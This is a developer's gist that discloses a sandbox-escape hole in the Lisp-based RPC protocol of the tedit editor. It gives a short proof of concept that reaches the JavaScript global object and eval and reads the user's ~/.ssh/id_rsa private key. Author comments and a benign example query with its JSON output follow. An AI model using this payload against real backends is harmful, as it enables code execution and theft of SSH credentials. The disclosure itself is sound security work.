Skip to content

Instantly share code, notes, and snippets.

@creationix

creationix/abusing-scope.cl Secret

Last active August 29, 2015 14:05
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save creationix/615a8afe09b97d221f09 to your computer and use it in GitHub Desktop.
Save creationix/615a8afe09b97d221f09 to your computer and use it in GitHub Desktop.
Download ZIP
Security hole in remote lisp for tedit
Raw
abusing-scope.cl
; Abuse the scope builtin to get access to the JS global
(def global (scope.call null))
; From that we can look up eval
(def eval global.eval)
; We can also look up environment variables
(def home global.process.env.HOME)
; And read the user's SSH key!
(readFile (+ home "/.ssh/id_rsa") "utf8")
@creationix
Copy link
Author

I'm creating an RPC protocol for tedit to connect to remote backends (though usually over localhost websocket most likely). To save on roundtrips and latency, the command language is a simplified LISP. You send a program to the backend and it sends back the result. (This is basically what SQL is to relational databases)

@creationix
Copy link
Author

A typical correct usage would be something like:

(repo.loadAs "commit" (repo.readRef "refs/heads/master"))

To read the master hash and load the commit in a single request instead of two round-trips.

@creationix
Copy link
Author

Here is a longer example:

(def head (repo.readRef "refs/heads/master"))
(def commit (repo.loadAs "commit" head))
(def root commit.tree)
(def tree (repo.loadAs "tree" root))
(def entry (tree "README.md"))
(def readme (repo.loadAs "text" entry.hash))
(object
  "head" head
  "commit" commit
  "tree" tree
  "readme" readme)

output

{
  "head": "7708d512fa78b2fbf4660f70c73741a6b7b7ac57",
  "commit": {
    "tree": "3e1a26f26f3ec73fb291bc16b8029ded2e347bc6",
    "parents": [
      "de3ae1bdd7a6429cd253d2151e3706ac865a1c49"
    ],
    "author": {
      "name": "Tim Caswell",
      "email": "tim@creationix.com",
      "date": {
        "seconds": 1407555167,
        "offset": 300
      }
    },
    "committer": {
      "name": "Tim Caswell",
      "email": "tim@creationix.com",
      "date": {
        "seconds": 1407555167,
        "offset": 300
      }
    },
    "message": "Fix submodule inside local git repo mount to work somewhat"
  },
  "tree": {
    ".gitmodules": {
      "mode": 33188,
      "hash": "605c805433af1632ea2400392e94679ada8eda15"
    },
    "LICENSE": {
      "mode": 33188,
      "hash": "626d764098d963e0b8a312cffbe3d8c6b838c585"
    },
    "README.md": {
      "mode": 33188,
      "hash": "413d5a65c19b405ea5ce45b284bb1999e15bb4fd"
    },
    "build": {
      "mode": 16384,
      "hash": "f829fddebbc28233d800c0284dcaf9f24233f34e"
    },
    "filters": {
      "mode": 57344,
      "hash": "7c055a4e0f15d70f3a97a8224b64b0ce812c5237"
    },
    "lib": {
      "mode": 16384,
      "hash": "36f7c45d30fd90e4114c8f965b1698d9f325ec6a"
    },
    "shared": {
      "mode": 16384,
      "hash": "72c4c4e38e7764cda16ce6c5e27321207a51170e"
    },
    "src-minimal": {
      "mode": 16384,
      "hash": "053a8c06d54be36fcc58ff4f6ecf298bc8f58f29"
    },
    "src-ui": {
      "mode": 16384,
      "hash": "d410e3300926eaa1c96a8e971b0c03f73493ad05"
    },
    "src": {
      "mode": 16384,
      "hash": "6fccd8fd5ff6fb112d0c66d9c250f7a1d5ab515d"
    }
  },
  "readme": "tedit-app\n=========\n\nTedit is a git based development environment.  When I say git based I mean you\ndon't edit files on disk.  You edit git databases directly.  Visually it looks\nmuch like a traditional editor complete with file tree and editor pane.  Under\nthe hood, you are browsing the git database graph and creating new nodes and\nupdating the root reference whenever you make a change.\n\nThe purpose of Tedit is to create a development platform that makes programming\nJavaScript easy and more accessable.  It runs great on ChromeBooks and soon\nthere will be a hosted web version that runs on mobile browsers on tablets.\n\nInstall at the Chrome [Web Store](https://chrome.google.com/webstore/detail/tedit-development-environ/ooekdijbnbbjdfjocaiflnjgoohnblgf)\n\n![Tedit Screenshot](http://creationix.com/tedit-0.1.12-1.png)\n\n## Hacking on Tedit\n\nSo you decided you want to help me build this awesome tool.  That's great.\n\nFirst, Tedit is a self-hosting compiler / editor / platform.  This means you\nneed Tedit to build Tedit.  Go get the chrome store version if you haven't\nalready.\n\nVisual walkthrough: <https://cloudup.com/cCMNHjdCw6q>\n\n - If you don't have a github token handy, create a new one at <https://github.com/settings/tokens/new>\n - Launch the [pre-built version of Tedit](https://chrome.google.com/webstore/detail/tedit-development-environ/ooekdijbnbbjdfjocaiflnjgoohnblgf) and using the context menu (right-click) in the\n   empty pane to the left, select \"Live Mount Github Repo\"\n - Enter `creationix/tedit-app` (or your fork if you want write access) in the first field and paste your token in the last.\n - Right-Click on the `chrome-app` folder in the new tree and select \"Live Export to Disk\".\n - Select a parent folder (I usually do Desktop) and a name for the target (I like `tedit`).\n - Watch the save icon spin while it exports the files to disk.\n - When done, open Chrome to <chrome://extensions>, enable developer mode, and add the exported folder as an unpacked extension.\n - Launch the generated version of tedit.  I recommend changing the color of this second version using `Control+B` to tell them apart.\n"
}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment